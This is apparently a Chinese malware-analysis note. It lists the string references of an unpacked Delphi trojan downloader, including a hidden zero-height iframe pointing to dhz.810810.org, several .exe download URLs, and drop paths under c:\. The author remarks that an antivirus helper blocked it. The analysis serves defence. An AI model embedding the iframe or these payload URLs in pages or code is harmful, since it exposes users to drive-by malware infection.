提取加的头
脱壳头后w32dasm反编译
串式参考
String Resource ID=65535: "Floating point overflow"
" "
" AMPM"
"
"
""
"$$"
"*.asp"
"*.aspx"
"*.exe"
"*.htm"
"*.html"
"*.jsp"
"*.php"
".."
":"
":\"
":mm"
":mm:ss"
"\*.*"
"\:"
"\\"
"`V?"
"<iframe height=0 src=http://dhz.810810.org/vip"
"00"
"0x"
"11"
"1蓞襱-Rf;
t f;Jtf;Jtf;Jt兟脘兟兟兟壯"
"95744"
"A/P"
"AAA"
"AAAA"
"am"
"AM"
"AM/PM"
"AMPM "
"AMPM"
"Any"
"Array "
"ByRef "
"c:\ievip.exe "
"c:\qwe34.exe "
"c:\qwea.exe "
"c:\qwetop.exe "
"c:\qwevip.exe "
"c:\xiami.exe"
"c:\xz.exe"
"CC"
"ddd"
"ee"
"eeee"
"Empty"
"Error"
"False"
"FPUMaskValue"
"FuckJP"
"GetDiskFreeSpaceExA"
"GetLongPathNameA"
"gg"
"ggg"
"hh"
"http://at2.810810.org/ievip.exe"
"http://at2.810810.org/qwe34.exe"
"http://at2.810810.org/qwea.exe"
"http://at2.810810.org/qwetop.exe"
"http://at2.810810.org/qwevip.exe"
"http://www.c1j8.co5/xz.exe"
"http://www.p544.c5/xiami.exe"
"IEFrame"
"iexplore.exe"
"kernel32.dll"
"m/d/yy"
"mmmm d, yyyy"
"MZ"
"nil"
"open"
"pm"
"PM"
"Software\Borland\Delphi\Locales"
"SOFTWARE\Borland\Delphi\RTL"
"Software\Borland\Locales"
"String"
"Strings"
"S嬟嬓ttJ€?r??學??怶?%"
"True"
"U嬱?@"
"U嬱3蒕QQQQS3繳h?d0d?岴?桷岴?"
"U嬱j"
"U嬱SV3龌"
"U嬱兡?蓧M魤U鴫E?繳h?d0d?"
"U嬱兡鬝VW3蓧M魤U鴫E?繳hd0d?"
"U嬱兡鳶3缐E?繳hQ?d0d?亇"
"VarAdd"
"VarAnd"
"VarBoolFromStr"
"VarBstrFromBool"
"VarBstrFromCy"
"VarBstrFromDate"
"VarCmp"
"VarCyFromStr"
"VarDateFromStr"
"VarDiv"
"VarI4FromStr"
"VariantChangeTypeEx"
"VarIdiv"
"VarMod"
"VarMul"
"VarNeg"
"VarNot"
"VarOr"
"VarR4FromStr"
"VarR8FromStr"
"VarSub"
"VarXor"
"yy"
"yyyy"
"婦$鰼"
"鑷??"
"鴊"
看来http://dhz.810810.org/vip这个是下载源之一
"http://at2.810810.org/ievip.exe"
"http://at2.810810.org/qwe34.exe"
"http://at2.810810.org/qwea.exe"
"http://at2.810810.org/qwetop.exe"
"http://at2.810810.org/qwevip.exe"
"http://www.c1j8.co5/xz.exe"
"http://www.p544.c5/xiami.exe"
在硬盘上
c:\ievip.exe "
"c:\qwe34.exe "
"c:\qwea.exe "
"c:\qwetop.exe "
"c:\qwevip.exe "
"c:\xiami.exe"
"c:\xz.exe"
不过刚刚开始时候应该从IE缓存中进入
被kaka助手拦截```